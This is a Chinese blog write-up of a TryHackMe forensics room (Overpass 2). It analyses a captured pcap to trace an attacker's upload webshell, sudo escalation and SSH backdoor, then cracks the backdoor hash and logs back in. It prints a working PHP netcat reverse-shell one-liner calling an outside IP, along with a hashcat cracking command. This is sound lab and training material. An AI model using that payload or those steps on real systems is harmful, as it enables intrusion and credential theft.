THM靶机overpass2-hacked流量分析溯源初体验

最新推荐文章于 2024-07-11 03:29:05 发布
最新推荐文章于 2024-07-11 03:29:05 发布
阅读量179 收藏 1
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43738494/article/details/131352917
版权

#流量分析

随便找一个tcp包:

发现其中有命令执行,推测是一个反弹shell,未加密,所以不太可能是msf或者其它c2的shell,只是一个普通的nc shell或者bash shell。

看到tcp之前的最后一个HTTP包:

序列14的包,这是一次上传反弹shell来getshell的攻击,包含关键词/uploads/payload, 判断是一次文件上传getshell,同时输入过滤,包含关键词upload, 找到漏洞uri:

http.request.uri contains "upload"

展开该包,发现payload:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

继续分析,调查其它可疑行为,首先是输入密码的操作,包括不限于su sudo ssh mysql等:

 看到一个sudo,应该是提权操作,跟踪该tcp流可以看到从头到尾全部操作:

敏感操作密码在su james 处:whenevernoteartinstant

 在提权尝试之后还建立了ssh后门:

 在下面发现对方使用的hash,破解这个hash就可以得到对方的常用(?)密码之一:

##首先找到对方使用的ssh后门的git项目https://github.com/NinjaJc01/ssh-backdoor,查看源码:

可以看到hash算法是crypto/sha512。

从tcp流中可以看到对方没有指定自己的hash,也就是用的源码里的默认hash:

 

 得到这些信息后,hashcat爆破,这里注意要提前把hash1里的hash调整成hashcat标准格式:

hashcat -m 1710 -a 0 -o cracked.txt hash1 /usr/share/wordlists/rockyou.txt

 这样就可以拿到ssh后门的密码,后面的任务就是黑回去:

首先扫描服务器端口:

 2222就是对方留的后门

现在我们知道密码,知道账号,直接ssh登录即可。

 新版openssh可能会碰到点困难,google一下。

进去之后会发现james的密码已经失效了,ssh的密码和原来的旧密码都没有用,所以这时候需要尝试横向一下。

我们原来有四个其它用户的旧密码:

 会发现所有密码均已经失效,狡猾的hacker修改了所有的密码。不过好心的hacker似乎留了一个提权后门:

看到最后一行的 /home/james/.suid_bash,相当可疑。

 

 提权成功。

总结:本靶机难度非常简单,不过可以帮助练习者快速建立流量分析和溯源信息搜集的基本印象。

 

 

#

 

s3cur3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
墨者靶场 中级:CMS系统漏洞分析溯源(第5题)
qq_43233085的博客
01-18 579
墨者靶场 中级:CMS系统漏洞分析溯源(第5题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日工程师发现一网站后台,苦苦尝试密码,一直未能登录,请你帮工程师想想办法。 实训目标 1、了解cookie的含义; 2、知晓常见验证方式; 3、熟练使用burp; 解题方向 不一定非要知道密码才能登录哦。 解题步骤 启动靶机,访问链接。 有题目可知方向是cookie修改登录,使用工具扫出后台...
溯源取证 - 流量分析 中等难度
weixin_48421613的博客
05-30 1025
通过本篇文章,学习ssh协议特点、学习流量导出文件、学习简单的逆向分析、学习hashcat的简单使用、学习查壳工具等
tryhackme--Overpass 2 - Hacked
qq_45414878的博客
11-05 470
tryhackme--Overpass 2 - HackedTask 1 -Forensics - Analyse the PCAP#1 What was the URL of the page they used to upload a reverse shell?#2 What payload did the attacker use to gain access?#3 What password did the attacker use to privesc?#4 How did the attack
Tryhackme-Overpass
个人博客
09-06 1021
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
Hack the Box CTF 网络流量分析 中等难度 Penetrated | Wireshark
A Little Bean
01-02 771
这是一道Hack the Box网络流量分析题,中等难度,题目本身就是一个 pcap 包。
ARP渗透与攻防(三)之流量分析
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-23 3066
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
THM3060--Reader-Source.rar_THM3060
07-15
THM3060读卡器的实现与解析》 在信息技术领域,硬件设备的驱动程序和应用程序的开发是至关重要的环节。本篇将详细探讨基于同方芯片THM3060的读卡器实现代码,以及相关知识点。 THM3060是一款由同方公司推出的高...
THM3070规格书-DingQi-Tech
11-02
该产品为同方微电子(清华大学微电子设计部...由于全国大部分身份证里的芯片也由北京同方微生产提供,所以其公司生产的RFID射频芯片,对应自家生产的身份证芯片,吻合性和读取速率是目前市场其它产品不可比拟的--THM3070
THM3010规格书-DingQi-Tech
11-02
该产品为同方微电子(清华大学微电子设计部参与)自主研发设计的一款13.56MHz非接触式射频读写芯片,只可用于...在智能门锁领域中,因为其超低功耗的优点,现已很多智能锁厂家,将RFID这块,转为了同方微的芯片-THM3010.
thm-discord-bot:TryHackMe Python Bot
01-28
不和谐机器人 TryHackMe Python不和谐机器人来源:由DarkStar7471 aka Jon创建 描述: 为在TryHackMe不和谐聊天服务器上使用而创建的机器人。 相关托管链接 ... 贡献者 黑暗之星7471 始提交和创建,始嵌齿轮和...
hacker.pcapng
04-05
有题可私
美国邦纳_THM选型手册2013-1-4.pdf
09-14
美国邦纳_THM选型手册2013-1-4pdf,
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)
qq_43233085的博客
01-16 838
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
dc-4靶机 命令注入及溯源反制
m0_48454948的博客
01-06 93
命令注入及溯源反制
冰蝎2流量分析,解密以及其防守姿势
热门推荐
瑞雪掩晨曦的博客
11-12 2万+
冰蝎2 文章目录冰蝎2流量分析(php)1.先来截图一下一下webshell2.通过上面解读的webshell,按照流程绘制了一个大致流程图3.接下来来测试冰蝎2的流量特征流量解密1.首先将第二次的秘钥填入密码内,将post请求内容放入解密2.解密成功3.将解密好的文件中有base64的加密 内容再次解密4.解密后结果5.上方的success为成功的意思,接下来的数据同上解密6.phpshell 的接下来请求为phpinfo的获取6.这里执行了phpinfo的获取进阶解析流量分析(jsp) 流量分析(php
墨者学院-在线靶场 - CMS系统漏洞分析溯源(第7题)
a519395243的博客
12-25 1454
墨者 在线靶场 CMS系统漏洞分析溯源(第7题) DEDECMS 任意用户密码重置漏洞利用   开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号 利用burp 抓包改 Post http://219.153.49.228:47764/member/resetpassword.php POST /member/resetpassword.php HTTP/1.1 dopo...
墨者靶场 级:CMS系统漏洞分析溯源(第8题)
qq_43233085的博客
01-19 859
墨者靶场 级:CMS系统漏洞分析溯源(第8题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 “墨者”安全工程师某日在网上冲浪时发现一个网站存在CMS漏洞,联系网站管理员拿到授权以后安全工程师一顿操作就拿到了网站的权限。 实训目标 1、了解网站常用后台; 2、掌握网站常用弱密码; 3、掌握cms命令执行漏洞 解题方向 查找网站后台getshell; 解题步骤 启动靶机,访问链接。 使用...
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
最新发布
Snu77的博客
07-11 1万+
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢复在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实现优于最新技术(State-of-The-Art, SOTA)
从零开始做题:logtime
weixin_44626085的博客
07-10 243
给出1个pcapng文件。
THM3060 应用笔记Type A 应用说明
11-29
2. THM3060对Type A的支持 THM3060能够支持Type A卡片的短帧通信和防冲突比特帧,同时具备标准帧的处理能力。这包括了对不同帧结构的理解和正确响应,确保与Type A卡片之间的通信流畅。 3. 详细说明 - 发送电路:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值